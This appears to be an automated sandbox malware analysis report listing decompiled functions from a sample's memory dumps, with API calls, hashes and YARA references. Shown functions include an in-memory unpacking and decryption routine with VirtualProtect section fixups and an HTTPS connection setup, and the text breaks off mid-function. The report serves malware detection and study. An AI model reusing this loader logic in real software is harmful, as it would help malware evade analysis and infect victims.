                                                                                                                                  Function 6E8D12B5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                  			E6E8D12B5(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6e8d41c0;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}












                                                                                                                                  0x6e8d12bf
                                                                                                                                  0x6e8d12cc
                                                                                                                                  0x6e8d12d2
                                                                                                                                  0x6e8d12de
                                                                                                                                  0x6e8d12ee
                                                                                                                                  0x6e8d12f0
                                                                                                                                  0x6e8d12f8
                                                                                                                                  0x6e8d138d
                                                                                                                                  0x6e8d1394
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d12fe
                                                                                                                                  0x6e8d12fe
                                                                                                                                  0x6e8d12fe
                                                                                                                                  0x6e8d1302
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d130e
                                                                                                                                  0x6e8d1312
                                                                                                                                  0x6e8d1336
                                                                                                                                  0x6e8d133a
                                                                                                                                  0x6e8d134e
                                                                                                                                  0x6e8d134e
                                                                                                                                  0x6e8d1354
                                                                                                                                  0x6e8d1363
                                                                                                                                  0x6e8d1367
                                                                                                                                  0x6e8d136f
                                                                                                                                  0x6e8d136f
                                                                                                                                  0x6e8d1377
                                                                                                                                  0x6e8d137a
                                                                                                                                  0x6e8d1387
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1387
                                                                                                                                  0x6e8d1342
                                                                                                                                  0x6e8d1346
                                                                                                                                  0x6e8d134c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d134c
                                                                                                                                  0x6e8d131a
                                                                                                                                  0x6e8d131e
                                                                                                                                  0x6e8d1328
                                                                                                                                  0x6e8d1320
                                                                                                                                  0x6e8d1320
                                                                                                                                  0x6e8d1320
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d131e
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6E8D12EE
                                                                                                                                  • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E8D1363
                                                                                                                                  • GetLastError.KERNEL32 ref: 6E8D1369
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual$ErrorLast
                                                                                                                                  • String ID: @Mt MtTt
                                                                                                                                  • API String ID: 1469625949-608512568
                                                                                                                                  • Opcode ID: 679d0cc6c45087c79dfe98508ce3bb3ed8de9601edab933f0e87b641a5592456
                                                                                                                                  • Instruction ID: f8e2bd4ce3a84b0c77390cf2a9b469d99ec897a5749f8932a06cc469cf284d89
                                                                                                                                  • Opcode Fuzzy Hash: 679d0cc6c45087c79dfe98508ce3bb3ed8de9601edab933f0e87b641a5592456
                                                                                                                                  • Instruction Fuzzy Hash: 7B216D7190020ADFDB18CFC5C885AAAF7F4FF08354F41486AE506D7459E7B8AA6CCB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8EC1E0, Relevance: 6.7, APIs: 1, Strings: 2, Instructions: 1462COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,6E97C338,000008BB), ref: 6E8ED345
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName
                                                                                                                                  • String ID: 1$N
                                                                                                                                  • API String ID: 514040917-3127171972
                                                                                                                                  • Opcode ID: e01c0125f54417ce094f99f143926840c8aab4021420303a4f29a0666aaf6396
                                                                                                                                  • Instruction ID: 92d9c2a95a581243fc26319c9670bf7367607d88b09f3bb69790878a78ee42e5
                                                                                                                                  • Opcode Fuzzy Hash: e01c0125f54417ce094f99f143926840c8aab4021420303a4f29a0666aaf6396
                                                                                                                                  • Instruction Fuzzy Hash: B7F260F150C9B08ECF08CF69CA90A797BB2FF97305B14891AD5459A785E3B8D58CDB08
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A33DA0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(80000002), ref: 00A33DFD
                                                                                                                                  • SysAllocString.OLEAUT32(00A328D9), ref: 00A33E41
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A33E55
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A33E63
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 344208780-0
                                                                                                                                  • Opcode ID: 55c93c866e91bfe76bbfc5dbcbc6886eaef9c5c113a4ee2c5c752b582614eab0
                                                                                                                                  • Instruction ID: e7351c42dc3926ace1c0d103a233b6c97703a79c2e54a9e0fe15022153302185
                                                                                                                                  • Opcode Fuzzy Hash: 55c93c866e91bfe76bbfc5dbcbc6886eaef9c5c113a4ee2c5c752b582614eab0
                                                                                                                                  • Instruction Fuzzy Hash: 02310972904249EFDF04CFD8D8848AEBBB9BF18350F20842EF9069B250D7349A41CBA5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8D189E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                  			E6E8D189E(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0x6e8d41b0;
				_t46 = E6E8D2016(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x6e8d41c0;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0x6e8d51a7; // 0x6e8d51a7
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E6E8D1AA6(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x6e8d41c0 = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}






















                                                                                                                                  0x6e8d18a5
                                                                                                                                  0x6e8d18b5
                                                                                                                                  0x6e8d18ba
                                                                                                                                  0x6e8d18bf
                                                                                                                                  0x6e8d18d4
                                                                                                                                  0x6e8d18db
                                                                                                                                  0x6e8d18e0
                                                                                                                                  0x6e8d18f1
                                                                                                                                  0x6e8d18f4
                                                                                                                                  0x6e8d18fa
                                                                                                                                  0x6e8d18ff
                                                                                                                                  0x6e8d19b2
                                                                                                                                  0x6e8d1905
                                                                                                                                  0x6e8d1905
                                                                                                                                  0x6e8d190b
                                                                                                                                  0x6e8d197a
                                                                                                                                  0x6e8d190d
                                                                                                                                  0x6e8d190d
                                                                                                                                  0x6e8d1910
                                                                                                                                  0x6e8d1912
                                                                                                                                  0x6e8d191a
                                                                                                                                  0x6e8d191d
                                                                                                                                  0x6e8d1920
                                                                                                                                  0x6e8d1928
                                                                                                                                  0x6e8d1933
                                                                                                                                  0x6e8d1934
                                                                                                                                  0x6e8d1935
                                                                                                                                  0x6e8d1952
                                                                                                                                  0x6e8d1960
                                                                                                                                  0x6e8d1967
                                                                                                                                  0x6e8d196a
                                                                                                                                  0x6e8d196d
                                                                                                                                  0x6e8d1975
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1925
                                                                                                                                  0x6e8d1925
                                                                                                                                  0x6e8d1977
                                                                                                                                  0x6e8d1984
                                                                                                                                  0x6e8d1999
                                                                                                                                  0x6e8d1986
                                                                                                                                  0x6e8d198f
                                                                                                                                  0x6e8d1994
                                                                                                                                  0x6e8d19aa
                                                                                                                                  0x6e8d19aa
                                                                                                                                  0x6e8d19b9
                                                                                                                                  0x6e8d19bf

                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,74E063F0,00003000,00000004,00000030,00000000,74E063F0,00000000,?,?,?,?,?,?,6E8D163B,00000000), ref: 6E8D18F4
                                                                                                                                  • memcpy.NTDLL(?,6E8D163B,74E063F0,?,?,?,?,?,?,6E8D163B,00000000,00000030,74E063F0,00000000), ref: 6E8D198F
                                                                                                                                  • VirtualFree.KERNELBASE(6E8D163B,00000000,00008000,?,?,?,?,?,?,6E8D163B,00000000), ref: 6E8D19AA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$AllocFreememcpy
                                                                                                                                  • String ID: Sep 18 2021
                                                                                                                                  • API String ID: 4010158826-1373364653
                                                                                                                                  • Opcode ID: fb9dadea5c0209c9bee6bc62d0242e1917c527637e240a015f9686e98b2335f2
                                                                                                                                  • Instruction ID: 20688fcda8fb7c0a9592fda70ba7368995b2ee53a0d97468f3bbb7284e995730
                                                                                                                                  • Opcode Fuzzy Hash: fb9dadea5c0209c9bee6bc62d0242e1917c527637e240a015f9686e98b2335f2
                                                                                                                                  • Instruction Fuzzy Hash: 6B313D71E0021AEFDB01DFD8C980AEEB7B9FF05304F504569E905BB281D771AA0ACB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8D1719, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                  			E6E8D1719(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E8D15C6(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                                                                                                                                  0x6e8d1722
                                                                                                                                  0x6e8d1727
                                                                                                                                  0x6e8d1735
                                                                                                                                  0x6e8d173a
                                                                                                                                  0x6e8d173a
                                                                                                                                  0x6e8d1740
                                                                                                                                  0x6e8d1745
                                                                                                                                  0x6e8d1749
                                                                                                                                  0x6e8d174d
                                                                                                                                  0x6e8d174d
                                                                                                                                  0x6e8d1757
                                                                                                                                  0x6e8d1760

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 6E8D171C
                                                                                                                                  • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E8D1727
                                                                                                                                  • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E8D173A
                                                                                                                                  • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E8D174D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1452675757-0
                                                                                                                                  • Opcode ID: f595774706689f51e9561da59ef32d54301253a957b702e5bbe31858dcf503cd
                                                                                                                                  • Instruction ID: 1a4a27e08ca20d8762b81d61f372cca8703ff713f1f625a7ec6a21dc8c21cf52
                                                                                                                                  • Opcode Fuzzy Hash: f595774706689f51e9561da59ef32d54301253a957b702e5bbe31858dcf503cd
                                                                                                                                  • Instruction Fuzzy Hash: 78E092313066156BA6122AAD4C88D6F7BACDF923307010635F524D62E4DB548C0EC5A5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A37749, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 23%
                                                                                                                                  			E00A37749(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _t34;
				long _t36;
				unsigned int _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t45;
				void* _t56;
				intOrPtr _t57;
				void* _t63;
				intOrPtr* _t65;
				intOrPtr* _t66;
				void* _t69;

				_t66 = __esi;
				_t63 = E00A31922(_t34, _a4);
				if(_t63 == 0) {
					L18:
					_t36 = GetLastError();
				} else {
					_t37 = GetVersion();
					_t69 = _t37 - 6;
					if(_t69 > 0) {
						L5:
						_a4 = 4;
					} else {
						if(_t69 != 0) {
							L4:
							_a4 = 0;
						} else {
							_t37 = _t37 >> 8;
							if(_t37 > 2) {
								goto L5;
							} else {
								goto L4;
							}
						}
					}
					__imp__(_t63, _a4, 0, 0, 0); // executed
					 *(_t66 + 0x10) = _t37;
					_t38 = E00A34AAB(_t63);
					if( *(_t66 + 0x10) == 0) {
						goto L18;
					} else {
						_t39 = E00A31922(_t38,  *_t66);
						_v8 = _t39;
						if(_t39 == 0) {
							goto L18;
						} else {
							_t65 = __imp__; // 0x6fa7f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
								_t40 = E00A34AAB(_v8);
								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x800100;
									_t56 = E00A31922(_t40,  *((intOrPtr*)(_t66 + 4)));
									if(_t56 == 0) {
										goto L18;
									} else {
										_t42 =  *0xa3d2e0; // 0x296a5a8
										_t19 = _t42 + 0xa3e758; // 0x450047
										_t43 = _t19;
										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
										E00A34AAB(_t56);
										_t45 =  *((intOrPtr*)(_t66 + 0x18));
										if(_t45 == 0) {
											goto L18;
										} else {
											_t57 = 4;
											_v12 = _t57;
											__imp__(_t45, 0x1f,  &_a4,  &_v12);
											if(_t45 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
											}
											_push(_t57);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t66 + 0x18)));
											if( *_t65() == 0) {
												goto L18;
											} else {
												_push(_t57);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t66 + 0x18)));
												if( *_t65() == 0) {
													goto L18;
												} else {
													_t36 = 0;
												}
											}
										}
									}
								}
							} else {
								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
								if(_t39 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t36;
			}




















                                                                                                                                  0x00a37749
                                                                                                                                  0x00a37758
                                                                                                                                  0x00a3775e
                                                                                                                                  0x00a3788f
                                                                                                                                  0x00a3788f
                                                                                                                                  0x00a37764
                                                                                                                                  0x00a37764
                                                                                                                                  0x00a3776a
                                                                                                                                  0x00a3776c
                                                                                                                                  0x00a3777c
                                                                                                                                  0x00a3777c
                                                                                                                                  0x00a3776e
                                                                                                                                  0x00a3776e
                                                                                                                                  0x00a37777
                                                                                                                                  0x00a37777
                                                                                                                                  0x00a37770
                                                                                                                                  0x00a37770
                                                                                                                                  0x00a37775
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37775
                                                                                                                                  0x00a3776e
                                                                                                                                  0x00a3778a
                                                                                                                                  0x00a37791
                                                                                                                                  0x00a37794
                                                                                                                                  0x00a3779c
                                                                                                                                  0x00000000
                                                                                                                                  0x00a377a2
                                                                                                                                  0x00a377a4
                                                                                                                                  0x00a377a9
                                                                                                                                  0x00a377ae
                                                                                                                                  0x00000000
                                                                                                                                  0x00a377b4
                                                                                                                                  0x00a377b4
                                                                                                                                  0x00a377bd
                                                                                                                                  0x00a377d4
                                                                                                                                  0x00a377e0
                                                                                                                                  0x00a377e9
                                                                                                                                  0x00a377ec
                                                                                                                                  0x00a377f4
                                                                                                                                  0x00000000
                                                                                                                                  0x00a377fa
                                                                                                                                  0x00a377fd
                                                                                                                                  0x00a37809
                                                                                                                                  0x00a3780f
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37811
                                                                                                                                  0x00a37814
                                                                                                                                  0x00a3781d
                                                                                                                                  0x00a3781d
                                                                                                                                  0x00a37827
                                                                                                                                  0x00a3782e
                                                                                                                                  0x00a37831
                                                                                                                                  0x00a37836
                                                                                                                                  0x00a3783b
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3783d
                                                                                                                                  0x00a3783f
                                                                                                                                  0x00a3784b
                                                                                                                                  0x00a3784e
                                                                                                                                  0x00a37856
                                                                                                                                  0x00a37858
                                                                                                                                  0x00a37869
                                                                                                                                  0x00a37869
                                                                                                                                  0x00a3786b
                                                                                                                                  0x00a3786f
                                                                                                                                  0x00a37870
                                                                                                                                  0x00a37872
                                                                                                                                  0x00a37879
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3787b
                                                                                                                                  0x00a3787b
                                                                                                                                  0x00a3787f
                                                                                                                                  0x00a37880
                                                                                                                                  0x00a37882
                                                                                                                                  0x00a37889
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3788b
                                                                                                                                  0x00a3788b
                                                                                                                                  0x00a3788b
                                                                                                                                  0x00a37889
                                                                                                                                  0x00a37879
                                                                                                                                  0x00a3783b
                                                                                                                                  0x00a3780f
                                                                                                                                  0x00a377bf
                                                                                                                                  0x00a377ca
                                                                                                                                  0x00a377ce
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a377ce
                                                                                                                                  0x00a377bd
                                                                                                                                  0x00a377ae
                                                                                                                                  0x00a3779c
                                                                                                                                  0x00a37898

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A31922: lstrlen.KERNEL32(?,00000000,033A9B38,00000000,00A374FF,033A9D16,?,?,?,?,?,69B25F44,00000005,00A3D00C), ref: 00A31929
                                                                                                                                    • Part of subcall function 00A31922: mbstowcs.NTDLL ref: 00A31952
                                                                                                                                    • Part of subcall function 00A31922: memset.NTDLL ref: 00A31964
                                                                                                                                  • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,00A3544C,00000000,00000000,033A9618,?,?,00A32A8A,?,033A9618,0000EA60), ref: 00A37764
                                                                                                                                  • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,00A3544C,00000000,00000000,033A9618,?,?,00A32A8A,?,033A9618,0000EA60), ref: 00A3788F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 4097109750-3251738875
                                                                                                                                  • Opcode ID: 47123aa9ef0b1a9eb9424b0bf1e8adcf669da5baba38edfc1ec977187ddc01b0
                                                                                                                                  • Instruction ID: 28503138333d22e6e18afdc4d6ef11e4f79b8471d716c13e4dc782549c0342f4
                                                                                                                                  • Opcode Fuzzy Hash: 47123aa9ef0b1a9eb9424b0bf1e8adcf669da5baba38edfc1ec977187ddc01b0
                                                                                                                                  • Instruction Fuzzy Hash: 0D415FB2504208FFEB359FA4DC89EAE7BBDEF08750F004529F642950A1E771DA85DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A35141, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 47%
                                                                                                                                  			E00A35141(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E00A375F6(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0xa3c2a4); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                                                                                                                                  0x00a35145
                                                                                                                                  0x00a35152
                                                                                                                                  0x00a35154
                                                                                                                                  0x00a35155
                                                                                                                                  0x00a3515d
                                                                                                                                  0x00a3515d
                                                                                                                                  0x00a35161
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a35158
                                                                                                                                  0x00a35159
                                                                                                                                  0x00a3515c
                                                                                                                                  0x00a3515c
                                                                                                                                  0x00a35169
                                                                                                                                  0x00a3516e
                                                                                                                                  0x00a35173
                                                                                                                                  0x00a3517b
                                                                                                                                  0x00a35181
                                                                                                                                  0x00a35183
                                                                                                                                  0x00a35186
                                                                                                                                  0x00a3518a
                                                                                                                                  0x00a3518c
                                                                                                                                  0x00a3518f
                                                                                                                                  0x00a3518f
                                                                                                                                  0x00a35190
                                                                                                                                  0x00a35192
                                                                                                                                  0x00a3518f
                                                                                                                                  0x00a3519c
                                                                                                                                  0x00a3519f
                                                                                                                                  0x00a351a2
                                                                                                                                  0x00a351a3
                                                                                                                                  0x00a351a5
                                                                                                                                  0x00a351ac
                                                                                                                                  0x00a351ac
                                                                                                                                  0x00a351b8

                                                                                                                                  APIs
                                                                                                                                  • StrChrA.SHLWAPI(?,00000020,00000000,033A95AC,00A35390,?,00A3935C,?,033A95AC,?,00A35390), ref: 00A3515D
                                                                                                                                  • StrTrimA.KERNELBASE(?,00A3C2A4,00000002,?,00A3935C,?,033A95AC,?,00A35390), ref: 00A3517B
                                                                                                                                  • StrChrA.SHLWAPI(?,00000020,?,00A3935C,?,033A95AC,?,00A35390), ref: 00A35186
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Trim
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3043112668-0
                                                                                                                                  • Opcode ID: 50bf4c0378aab2dc343c3a307a2f17508088ef5aa3ab5490a92c84dc1d5a0ece
                                                                                                                                  • Instruction ID: f11a86ffbf5d8bbb0b43c0222624bce902705e715013aa9b60fbabb963ed4331
                                                                                                                                  • Opcode Fuzzy Hash: 50bf4c0378aab2dc343c3a307a2f17508088ef5aa3ab5490a92c84dc1d5a0ece
                                                                                                                                  • Instruction Fuzzy Hash: DB01BC71B04746AFE724AB7E8C44F67BB9DEB86740F140112BA45CB282DA70C80287A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A31F72, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 32%
                                                                                                                                  			E00A31F72(intOrPtr _a4, signed int _a8) {
